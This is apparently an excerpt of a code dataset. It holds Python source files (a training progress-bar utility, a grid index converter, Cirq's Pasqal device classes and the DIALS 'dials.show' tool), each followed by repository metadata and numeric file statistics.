_, term_width = os.popen('stty size', 'r').read().split()
term_width = int(term_width)
TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time
#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
global last_time, begin_time
if current == 0:
begin_time = time.time() # Reset for new bar.
cur_len = int(TOTAL_BAR_LENGTH*current/total)
rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1
sys.stdout.write(' [')
for i in range(cur_len):
sys.stdout.write('=')
sys.stdout.write('>')
for i in range(rest_len):
sys.stdout.write('.')
sys.stdout.write(']')
cur_time = time.time()
step_time = cur_time - last_time
last_time = cur_time
tot_time = cur_time - begin_time
L = []
if msg:
L.append(' | ' + msg)
msg = ''.join(L)
sys.stdout.write(msg)
for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):
sys.stdout.write(' ')
# Go back to the center of the bar.
for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):
sys.stdout.write('\b')
sys.stdout.write(' %d/%d ' % (current+1, total))
if current < total-1:
sys.stdout.write('\r')
else:
sys.stdout.write('\n')
sys.stdout.flush()
def set_lr(optimizer, lr):
for group in optimizer.param_groups:
group['lr'] = lr
def clip_gradient(optimizer, grad_clip):
for group in optimizer.param_groups:
#print(group['params'])
for param in group['params']:
param.grad.data.clamp_(-grad_clip, grad_clip)
| 27.101266
| 76
| 0.604858
| 308
| 2,141
| 4.045455
| 0.327922
| 0.086677
| 0.123596
| 0.054575
| 0.250401
| 0.218299
| 0.138042
| 0.05939
| 0.05939
| 0.05939
| 0
| 0.021144
| 0.248949
| 2,141
| 78
| 77
| 27.448718
| 0.753731
| 0.148996
| 0
| 0.071429
| 0
| 0
| 0.034282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.142857
| 0
| 0.196429
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a1bd490fa794c86a7ba173a9dce9709f3eb600
| 2,236
|
py
|
Python
|
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | null | null | null |
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | null | null | null |
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | 3
|
2020-03-16T04:33:50.000Z
|
2021-03-19T17:25:59.000Z
|
from __future__ import absolute_import, division, print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
import numpy as np
import utils
logger = logging.getLogger("indexconverter")
class IndexConverter(object):
def __init__(self, ndim, ngrid):
self.ndim = ndim
self.ngrid = ngrid
self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
self._zerodim = np.zeros((self.ndim,))
self.nbins = int(np.rint((ngrid - 1) ** ndim))
def convert_to_vector(self, grid):
if grid.shape[0] != self.ngrid - 1:
raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0]))
vector = np.empty((self.nbins,))
for bin_idx in range(self.nbins):
vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
return vector
def convert_to_grid(self, vector):
grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
if len(vector.shape) > 1:
grids = np.empty((len(vector),) + grid_shape)
for idx, v in enumerate(vector):
grids[idx] = self.convert_to_grid(v)
return grids
else:
grid = np.zeros(grid_shape)
for idx in range(len(vector)):
grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
return grid
def convert_to_grid_idx(self, bin_idx):
if bin_idx >= self.nbins or bin_idx < 0:
print(self.nbins, self.ndim, self.nbins ** self.ndim)
raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
return grid_idx.astype(int)
def convert_to_bin_idx(self, grid_idx):
bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
if bin_idx >= self.nbins or bin_idx < 0:
raise Exception(
"Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
return bin_idx
| 38.551724
| 116
| 0.609123
| 315
| 2,236
| 4.155556
| 0.27619
| 0.064171
| 0.049656
| 0.038961
| 0.135982
| 0.135982
| 0.135982
| 0.091673
| 0.039725
| 0
| 0
| 0.007273
| 0.262075
| 2,236
| 57
| 117
| 39.22807
| 0.786061
| 0
| 0
| 0.040816
| 0
| 0
| 0.110465
| 0.010286
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102041
| false
| 0
| 0.102041
| 0
| 0.326531
| 0.040816
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a37502649b0fcb2349b60e7e2d86e82dd233f5
| 12,050
|
py
|
Python
|
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | 1
|
2022-02-05T22:17:39.000Z
|
2022-02-05T22:17:39.000Z
|
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | null | null | null |
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict
import numpy as np
import networkx as nx
import cirq
from cirq import _compat, GridQubit, LineQubit
from cirq.ops import NamedQubit
from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset
@cirq.value.value_equality
class PasqalDevice(cirq.devices.Device):
"""A generic Pasqal device.
The most general of Pasqal devices, enforcing only restrictions expected to
be shared by all future devices. Serves as the parent class of all Pasqal
devices, but can also be used on its own for hosting a nearly unconstrained
device. When used as a circuit's device, the qubits have to be of the type
cirq.NamedQubit and assumed to be all connected, the idea behind it being
that after submission, all optimization and transpilation necessary for its
execution on the specified device are handled internally by Pasqal.
"""
def __init__(self, qubits: Sequence[cirq.Qid]) -> None:
"""Initializes a device with some qubits.
Args:
qubits (NamedQubit): Qubits on the device, exclusively unrelated to
a physical position.
Raises:
TypeError: If the wrong qubit type is provided.
ValueError: If the number of qubits is greater than the devices maximum.
"""
if len(qubits) > 0:
q_type = type(qubits[0])
for q in qubits:
if not isinstance(q, self.supported_qubit_type):
raise TypeError(
'Unsupported qubit type: {!r}. This device '
'supports qubit types: {}'.format(q, self.supported_qubit_type)
)
if not type(q) is q_type:
raise TypeError("All qubits must be of same type.")
if len(qubits) > self.maximum_qubit_number:
raise ValueError(
'Too many qubits. {} accepts at most {} '
'qubits.'.format(type(self), self.maximum_qubit_number)
)
self.gateset = PasqalGateset()
self.qubits = qubits
self._metadata = cirq.DeviceMetadata(
qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])
)
# pylint: enable=missing-raises-doc
@property
def supported_qubit_type(self):
return (NamedQubit,)
@property
def maximum_qubit_number(self):
return 100
@property
def metadata(self):
return self._metadata
@_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')
def qubit_set(self) -> FrozenSet[cirq.Qid]:
return frozenset(self.qubits)
def qubit_list(self):
return [qubit for qubit in self.qubits]
def is_pasqal_device_op(self, op: cirq.Operation) -> bool:
if not isinstance(op, cirq.Operation):
raise ValueError('Got unknown operation:', op)
return op in self.gateset
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: The operation to validate.
Raises:
ValueError: If the operation is not valid.
NotImplementedError: If the operation is a measurement with an invert
mask.
"""
if not isinstance(operation, cirq.GateOperation):
raise ValueError("Unsupported operation")
if not self.is_pasqal_device_op(operation):
raise ValueError(f'{operation.gate!r} is not a supported gate')
for qub in operation.qubits:
if not isinstance(qub, self.supported_qubit_type):
raise ValueError(
'{} is not a valid qubit for gate {!r}. This '
'device accepts gates on qubits of type: '
'{}'.format(qub, operation.gate, self.supported_qubit_type)
)
if qub not in self.metadata.qubit_set:
raise ValueError(f'{qub} is not part of the device.')
if isinstance(operation.gate, cirq.MeasurementGate):
if operation.gate.invert_mask != ():
raise NotImplementedError(
"Measurements on Pasqal devices don't support invert_mask."
)
def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:
"""Raises an error if the given circuit is invalid on this device.
A circuit is invalid if any of its moments are invalid or if there
is a non-empty moment after a moment with a measurement.
Args:
circuit: The circuit to validate
Raises:
ValueError: If the given circuit can't be run on this device
"""
super().validate_circuit(circuit)
# Measurements must be in the last non-empty moment
has_measurement_occurred = False
for moment in circuit:
if has_measurement_occurred:
if len(moment.operations) > 0:
raise ValueError("Non-empty moment after measurement")
for operation in moment.operations:
if isinstance(operation.gate, cirq.MeasurementGate):
has_measurement_occurred = True
def __repr__(self):
return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'
def _value_equality_values_(self):
return self.qubits
def _json_dict_(self):
return cirq.protocols.obj_to_dict_helper(self, ['qubits'])
class PasqalVirtualDevice(PasqalDevice):
"""A Pasqal virtual device with qubits in 3d.
A virtual representation of a Pasqal device, enforcing the constraints
typically found in a physical device. The qubits can be positioned in 3d
space, although 2d layouts will be supported sooner and are thus
recommended. Only accepts qubits with physical placement.
"""
def __init__(
self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]
) -> None:
"""Initializes a device with some qubits.
Args:
control_radius: the maximum distance between qubits for a controlled
gate. Distance is measured in units of the coordinates passed
into the qubit constructor.
qubits: Qubits on the device, identified by their x, y, z position.
Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.
Raises:
ValueError: if the wrong qubit type is provided or if invalid
parameter is provided for control_radius."""
super().__init__(qubits)
if not control_radius >= 0:
raise ValueError('Control_radius needs to be a non-negative float.')
if len(self.qubits) > 1:
if control_radius > 3.0 * self.minimal_distance():
raise ValueError(
'Control_radius cannot be larger than 3 times'
' the minimal distance between qubits.'
)
self.control_radius = control_radius
self.gateset = PasqalGateset(include_additional_controlled_ops=False)
self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))
@property
def supported_qubit_type(self):
return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: the operation to validate
Raises:
ValueError: If the operation is not valid
"""
super().validate_operation(operation)
# Verify that a controlled gate operation is valid
if operation in self.controlled_gateset:
for p in operation.qubits:
for q in operation.qubits:
if self.distance(p, q) > self.control_radius:
raise ValueError(f"Qubits {p!r}, {q!r} are too far away")
def validate_moment(self, moment: cirq.Moment):
"""Raises an error if the given moment is invalid on this device.
Args:
moment: The moment to validate.
Raises:
ValueError: If the given moment is invalid.
"""
super().validate_moment(moment)
if len(moment) > 1:
for operation in moment:
if not isinstance(operation.gate, cirq.MeasurementGate):
raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.")
def minimal_distance(self) -> float:
"""Returns the minimal distance between two qubits in qubits.
Args:
qubits: qubit involved in the distance computation
Raises:
ValueError: If the device has only one qubit
Returns:
The minimal distance between qubits, in spacial coordinate units.
"""
if len(self.qubits) <= 1:
raise ValueError("Two qubits to compute a minimal distance.")
return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])
def distance(self, p: Any, q: Any) -> float:
"""Returns the distance between two qubits.
Args:
p: qubit involved in the distance computation
q: qubit involved in the distance computation
Raises:
ValueError: If p or q not part of the device
Returns:
The distance between qubits p and q.
"""
all_qubits = self.qubit_list()
if p not in all_qubits or q not in all_qubits:
raise ValueError("Qubit not part of the device.")
if isinstance(p, GridQubit):
return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)
if isinstance(p, LineQubit):
return abs(p.x - q.x)
return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)
def __repr__(self):
return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(
self.control_radius, sorted(self.qubits)
)
def _value_equality_values_(self) -> Any:
return (self.control_radius, self.qubits)
def _json_dict_(self) -> Dict[str, Any]:
return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])
@_compat.deprecated_class(
deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'
)
class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):
"""A gate converter for compatibility with Pasqal processors.
Modified version of ConvertToNeutralAtomGates, where a new 'convert' method
'pasqal_convert' takes the 'keep' function as an input.
"""
def pasqal_convert(
self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]
) -> List[cirq.Operation]:
def on_stuck_raise(bad):
return TypeError(
"Don't know how to work with {!r}. "
"It isn't a native PasqalDevice operation, "
"a 1 or 2 qubit gate with a known unitary, "
"or composite.".format(bad)
)
return cirq.protocols.decompose(
op,
keep=keep,
intercepting_decomposer=self._convert_one,
on_stuck_raise=None if self.ignore_failures else on_stuck_raise,
)
| 37.42236
| 99
| 0.630954
| 1,493
| 12,050
| 5.002009
| 0.229739
| 0.024371
| 0.01406
| 0.016872
| 0.201794
| 0.15225
| 0.118104
| 0.082217
| 0.061328
| 0.046599
| 0
| 0.005036
| 0.291452
| 12,050
| 321
| 100
| 37.538941
| 0.869642
| 0.326058
| 0
| 0.096154
| 0
| 0
| 0.151161
| 0.02495
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147436
| false
| 0
| 0.044872
| 0.083333
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a3efacb490990d88c7dfa47acc3b8f0d98c63a
| 22,798
|
py
|
Python
|
command_line/show.py
|
huwjenkins/dials
|
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
|
[
"BSD-3-Clause"
] | null | null | null |
command_line/show.py
|
huwjenkins/dials
|
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
|
[
"BSD-3-Clause"
] | 1
|
2019-06-03T16:09:12.000Z
|
2019-06-04T12:47:20.000Z
|
command_line/show.py
|
rjgildea/dials
|
0665a385d644bbef7541fb2d33c7a3c5a748e2b4
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import numpy as np
import iotbx.phil
from cctbx import uctbx
from dxtbx.model.experiment_list import ExperimentListFactory
from scitbx.math import five_number_summary
import dials.util
from dials.array_family import flex
from dials.util import Sorry, tabulate
help_message = """
Examples::
dials.show models.expt
dials.show image_*.cbf
dials.show observations.refl
"""
phil_scope = iotbx.phil.parse(
"""\
show_scan_varying = False
.type = bool
.help = "Whether or not to show the crystal at each scan point."
show_shared_models = False
.type = bool
.help = "Show which models are linked to which experiments"
show_all_reflection_data = False
.type = bool
.help = "Whether or not to print individual reflections"
show_intensities = False
.type = bool
show_centroids = False
.type = bool
show_profile_fit = False
.type = bool
show_flags = False
.type = bool
.help = "Show a summary table of reflection flags"
show_identifiers = False
.type = bool
.help = "Show experiment identifiers map if set"
image_statistics{
show_corrected = False
.type = bool
.help = "Show statistics on the distribution of values in each corrected image"
show_raw = False
.type = bool
.help = "Show statistics on the distribution of values in each raw image"
}
max_reflections = None
.type = int
.help = "Limit the number of reflections in the output."
""",
process_includes=True,
)
def beam_centre_mm(detector, s0):
x, y = (None, None)
for panel_id, panel in enumerate(detector):
try:
x, y = panel.get_ray_intersection(s0)
except RuntimeError:
continue
else:
if panel.is_coord_valid_mm((x, y)):
break
else:
x, y = (None, None)
return panel_id, (x, y)
def beam_centre_raw_image_px(detector, s0):
panel_id, (x, y) = beam_centre_mm(detector, s0)
panel = detector[panel_id]
x_px, y_px = panel.millimeter_to_pixel((x, y))
offset = panel.get_raw_image_offset()
return x_px + offset[0], y_px + offset[1]
def show_beam(detector, beam):
# standard static beam model string
s = str(beam)
# report whether the beam is scan-varying
if beam.num_scan_points > 0:
s += " s0 sampled at " + str(beam.num_scan_points) + " scan points\n"
# add static model beam centres
panel_id, (x, y) = beam_centre_mm(detector, beam.get_s0())
if panel_id >= 0 and x is not None and y is not None:
x_px, y_px = detector[panel_id].millimeter_to_pixel((x, y))
if len(detector) > 1:
beam_centre_mm_str = " mm: panel %i, (%.2f,%.2f)" % (panel_id, x, y)
beam_centre_px_str = " px: panel %i, (%.2f,%.2f)" % (
panel_id,
x_px,
y_px,
)
x_raw_px, y_raw_px = beam_centre_raw_image_px(detector, beam.get_s0())
beam_centre_raw_px_str = " px, raw image: ({:.2f},{:.2f})".format(
x_raw_px,
y_raw_px,
)
x_raw_mm, y_raw_mm = detector[panel_id].pixel_to_millimeter(
(x_raw_px, y_raw_px)
)
beam_centre_raw_mm_str = " mm, raw image: ({:.2f},{:.2f})".format(
x_raw_mm,
y_raw_mm,
)
else:
beam_centre_mm_str = f" mm: ({x:.2f},{y:.2f})"
beam_centre_px_str = f" px: ({x_px:.2f},{y_px:.2f})"
beam_centre_raw_px_str = ""
beam_centre_raw_mm_str = ""
s += "\nBeam centre: \n"
s += beam_centre_mm_str + "\n" + beam_centre_px_str + "\n"
if beam_centre_raw_mm_str:
s += beam_centre_raw_mm_str + "\n"
if beam_centre_raw_px_str:
s += beam_centre_raw_px_str + "\n"
# report range of scan-varying model beam centres
if beam.num_scan_points > 0:
# get scan-varying beam centres, ensuring all on same panel
sv_s0 = beam.get_s0_at_scan_points()
impacts = [beam_centre_mm(detector, s0) for s0 in sv_s0]
pnl, xy = zip(*impacts)
uniq_pnls = set(pnl)
if len(uniq_pnls) > 1 or min(uniq_pnls) < 0:
return s
if any(e == (None, None) for e in xy):
return s
pnl = list(uniq_pnls)[0]
x_mm, y_mm = zip(*xy)
# convert to pixels
xy = [detector[pnl].millimeter_to_pixel(e) for e in xy]
x_px, y_px = zip(*xy)
s += "Beam centre range (mm): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format(
min(x_mm),
max(x_mm),
min(y_mm),
max(y_mm),
)
s += "Beam centre range (px): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format(
min(x_px),
max(x_px),
min(y_px),
max(y_px),
)
return s
def show_goniometer(goniometer):
# standard static goniometer model string
s = str(goniometer)
# report whether the goniometer is scan-varying
if goniometer.num_scan_points > 0:
s += (
" Setting rotation sampled at "
+ str(goniometer.num_scan_points)
+ " scan points\n"
)
return s
@dials.util.show_mail_handle_errors()
def run(args=None):
import dials.util.log
dials.util.log.print_banner()
from dials.util.options import OptionParser, reflections_and_experiments_from_files
usage = "dials.show [options] models.expt | image_*.cbf"
parser = OptionParser(
usage=usage,
phil=phil_scope,
read_experiments=True,
read_experiments_from_images=True,
read_reflections=True,
check_format=False,
epilog=help_message,
)
params, options = parser.parse_args(args=args, show_diff_phil=True)
reflections, experiments = reflections_and_experiments_from_files(
params.input.reflections, params.input.experiments
)
if len(experiments) == 0 and len(reflections) == 0:
parser.print_help()
exit()
if len(experiments):
if not all(e.detector for e in experiments):
sys.exit("Error: experiment has no detector")
if not all(e.beam for e in experiments):
sys.exit("Error: experiment has no beam")
print(show_experiments(experiments, show_scan_varying=params.show_scan_varying))
if params.image_statistics.show_raw:
show_image_statistics(experiments, "raw")
if params.image_statistics.show_corrected:
show_image_statistics(experiments, "corrected")
if params.show_shared_models:
print()
print(model_connectivity(experiments))
if len(reflections):
print(
show_reflections(
reflections,
show_intensities=params.show_intensities,
show_profile_fit=params.show_profile_fit,
show_centroids=params.show_centroids,
show_all_reflection_data=params.show_all_reflection_data,
show_flags=params.show_flags,
max_reflections=params.max_reflections,
show_identifiers=params.show_identifiers,
)
)
def show_experiments(experiments, show_scan_varying=False):
text = []
for i_expt, expt in enumerate(experiments):
text.append("Experiment %i:" % i_expt)
format_class = expt.imageset.get_format_class()
if format_class.__name__ != "Format":
text.append(f"Format class: {format_class.__name__}")
if expt.identifier != "":
text.append(f"Experiment identifier: {expt.identifier}")
try:
template = expt.imageset.get_template()
except AttributeError:
template = None
if template:
text.append(f"Image template: {template}")
text.append(str(expt.detector))
text.append(
"Max resolution (at corners): %f"
% (expt.detector.get_max_resolution(expt.beam.get_s0()))
)
text.append(
"Max resolution (inscribed): %f"
% (expt.detector.get_max_inscribed_resolution(expt.beam.get_s0()))
)
text.append("")
text.append(show_beam(expt.detector, expt.beam))
if expt.scan is not None:
text.append(str(expt.scan))
if expt.goniometer is not None:
text.append(show_goniometer(expt.goniometer))
if expt.crystal is not None:
text.append(expt.crystal.as_str(show_scan_varying=show_scan_varying))
if expt.crystal.num_scan_points:
abc = flex.vec3_double()
angles = flex.vec3_double()
for n in range(expt.crystal.num_scan_points):
(
a,
b,
c,
alpha,
beta,
gamma,
) = expt.crystal.get_unit_cell_at_scan_point(n).parameters()
abc.append((a, b, c))
angles.append((alpha, beta, gamma))
a, b, c = abc.mean()
alpha, beta, gamma = angles.mean()
mean_unit_cell = uctbx.unit_cell((a, b, c, alpha, beta, gamma))
text.append(f" Average unit cell: {mean_unit_cell}")
if expt.profile is not None:
text.append(str(expt.profile))
if expt.scaling_model is not None:
text.append(str(expt.scaling_model))
return "\n".join(text)
def show_image_statistics(experiments, im_type):
if im_type == "raw":
raw = True
elif im_type == "corrected":
raw = False
else:
raise ValueError(f"Unknown im_type: {im_type}")
# To show image statistics, check_format has to be true. So we have to reinstatiate
# the experiment list here
try:
experiments = ExperimentListFactory.from_json(
experiments.as_json(), check_format=True
)
except OSError as e:
raise Sorry(
f"Unable to read image data. Please check {e.filename} is accessible"
)
print(f"Five number summary of the {im_type} images")
for i_expt, expt in enumerate(experiments):
for i in range(len(expt.imageset)):
identifier = os.path.basename(expt.imageset.get_image_identifier(i))
if raw:
pnl_data = expt.imageset.get_raw_data(i)
else:
pnl_data = expt.imageset.get_corrected_data(i)
if not isinstance(pnl_data, tuple):
pnl_data = (pnl_data,)
flat_data = pnl_data[0].as_1d()
for p in pnl_data[1:]:
flat_data.extend(p.as_1d())
fns = five_number_summary(flat_data)
print(
"{}: Min: {:.1f} Q1: {:.1f} Med: {:.1f} Q3: {:.1f} Max: {:.1f}".format(
identifier, *fns
)
)
def model_connectivity(experiments):
def model_connectivity_impl(experiments, model):
text = [""]
text.append(f"{model.capitalize()}:")
models = getattr(experiments, f"{model}s")()
rows = [[""] + [str(j) for j in range(len(models))]]
for j, e in enumerate(experiments):
row = ["Experiment %d" % j]
for m in models:
if getattr(e, model) is m:
row.append("x")
else:
row.append(".")
rows.append(row)
text.append(tabulate(rows, tablefmt="plain"))
return text
if len(experiments) == 1:
return ""
text = []
text.append("Experiment / Models")
text.extend(model_connectivity_impl(experiments, "detector"))
text.extend(model_connectivity_impl(experiments, "crystal"))
text.extend(model_connectivity_impl(experiments, "beam"))
return "\n".join(text)
def _create_flag_count_table(table):
"""Generate a summary table of flag values in a reflection table.
:param table: A reflection table
:returns: A string of the formatted flags table
"""
# Calculate the counts of entries that match each flag
numpy_flags = table["flags"].as_numpy_array()
flag_count = {
flag: np.sum(numpy_flags & value != 0)
for value, flag in table.flags.values.items()
}
# Work out the numeric-value order of the flags
flag_order = sorted(table.flags.values.values(), key=lambda x: x.real)
# Build the actual table
flag_rows = [["Flag", "Count", "%"]]
max_count_len = max(5, len(str(max(flag_count.values()))))
last_flag = None
for flag in flag_order:
indent = ""
# As a hint for reading, indent any 'summary' flags.
# A summary flag is any flag which overlaps with the previous one.
if last_flag and (last_flag.real & flag.real):
indent = " "
last_flag = flag
# Add the row to the table we're building
flag_rows.append(
[
indent + flag.name,
"{:{:d}d}".format(flag_count[flag], max_count_len),
f"{100 * flag_count[flag] / len(table):5.01f}",
]
)
# Build the array of output strings
text = []
text.append("Reflection flags:")
text.append(tabulate(flag_rows, headers="firstrow"))
return "\n".join(text)
def show_reflections(
reflections,
show_intensities=False,
show_profile_fit=False,
show_centroids=False,
show_all_reflection_data=False,
show_flags=False,
max_reflections=None,
show_identifiers=False,
):
text = []
from orderedset import OrderedSet
formats = {
"miller_index": "%i, %i, %i",
"d": "%.2f",
"qe": "%.3f",
"dqe": "%.3f",
"id": "%i",
"imageset_id": "%i",
"panel": "%i",
"flags": "%i",
"background.mean": "%.1f",
"background.dispersion": "%.1f",
"background.mse": "%.1f",
"background.sum.value": "%.1f",
"background.sum.variance": "%.1f",
"intensity.prf.value": "%.1f",
"intensity.prf.variance": "%.1f",
"intensity.sum.value": "%.1f",
"intensity.sum.variance": "%.1f",
"intensity.cor.value": "%.1f",
"intensity.cor.variance": "%.1f",
"intensity.scale.value": "%.1f",
"intensity.scale.variance": "%.1f",
"Ih_values": "%.1f",
"lp": "%.3f",
"num_pixels.background": "%i",
"num_pixels.background_used": "%i",
"num_pixels.foreground": "%i",
"num_pixels.valid": "%i",
"partial_id": "%i",
"partiality": "%.4f",
"profile.correlation": "%.3f",
"profile.rmsd": "%.3f",
"xyzcal.mm": "%.2f, %.2f, %.2f",
"xyzcal.px": "%.2f, %.2f, %.2f",
"delpsical.rad": "%.3f",
"delpsical2": "%.3f",
"delpsical.weights": "%.3f",
"xyzobs.mm.value": "%.2f, %.2f, %.2f",
"xyzobs.mm.variance": "%.4e, %.4e, %.4e",
"xyzobs.px.value": "%.2f, %.2f, %.2f",
"xyzobs.px.variance": "%.4f, %.4f, %.4f",
"s1": "%.4f, %.4f, %.4f",
"s2": "%.4f, %.4f, %.4f",
"shoebox": "%.1f",
"rlp": "%.4f, %.4f, %.4f",
"zeta": "%.3f",
"x_resid": "%.3f",
"x_resid2": "%.3f",
"y_resid": "%.3f",
"y_resid2": "%.3f",
"kapton_absorption_correction": "%.3f",
"kapton_absorption_correction_sigmas": "%.3f",
"inverse_scale_factor": "%.3f",
"inverse_scale_factor_variance": "%.3f",
}
for rlist in reflections:
from dials.algorithms.shoebox import MaskCode
foreground_valid = MaskCode.Valid | MaskCode.Foreground
text.append("")
text.append(f"Reflection list contains {len(rlist)} reflections")
if len(rlist) == 0:
continue
rows = [["Column", "min", "max", "mean"]]
for k, col in rlist.cols():
if k in formats and "%" not in formats.get(k, "%s"):
# Allow blanking out of entries that wouldn't make sense
rows.append(
[
k,
formats.get(k, "%s"),
formats.get(k, "%s"),
formats.get(k, "%s"),
]
)
elif type(col) in (flex.double, flex.int, flex.size_t):
if type(col) in (flex.int, flex.size_t):
col = col.as_double()
rows.append(
[
k,
formats.get(k, "%s") % flex.min(col),
formats.get(k, "%s") % flex.max(col),
formats.get(k, "%s") % flex.mean(col),
]
)
elif type(col) in (flex.vec3_double, flex.miller_index):
if isinstance(col, flex.miller_index):
col = col.as_vec3_double()
rows.append(
[
k,
formats.get(k, "%s") % col.min(),
formats.get(k, "%s") % col.max(),
formats.get(k, "%s") % col.mean(),
]
)
elif isinstance(col, flex.shoebox):
rows.append([k, "", "", ""])
si = col.summed_intensity().observed_value()
rows.append(
[
" summed I",
formats.get(k, "%s") % flex.min(si),
formats.get(k, "%s") % flex.max(si),
formats.get(k, "%s") % flex.mean(si),
]
)
x1, x2, y1, y2, z1, z2 = col.bounding_boxes().parts()
bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double()
rows.append(
[
" N pix",
formats.get(k, "%s") % flex.min(bbox_sizes),
formats.get(k, "%s") % flex.max(bbox_sizes),
formats.get(k, "%s") % flex.mean(bbox_sizes),
]
)
fore_valid = col.count_mask_values(foreground_valid).as_double()
rows.append(
[
" N valid foreground pix",
formats.get(k, "%s") % flex.min(fore_valid),
formats.get(k, "%s") % flex.max(fore_valid),
formats.get(k, "%s") % flex.mean(fore_valid),
]
)
text.append(tabulate(rows, headers="firstrow"))
if show_flags:
text.append(_create_flag_count_table(rlist))
if show_identifiers:
if rlist.experiment_identifiers():
text.append(
"""Experiment identifiers id-map values:\n%s"""
% (
"\n".join(
"id:"
+ str(k)
+ " -> experiment identifier:"
+ str(rlist.experiment_identifiers()[k])
for k in rlist.experiment_identifiers().keys()
)
)
)
intensity_keys = (
"miller_index",
"d",
"intensity.prf.value",
"intensity.prf.variance",
"intensity.sum.value",
"intensity.sum.variance",
"background.mean",
"profile.correlation",
"profile.rmsd",
)
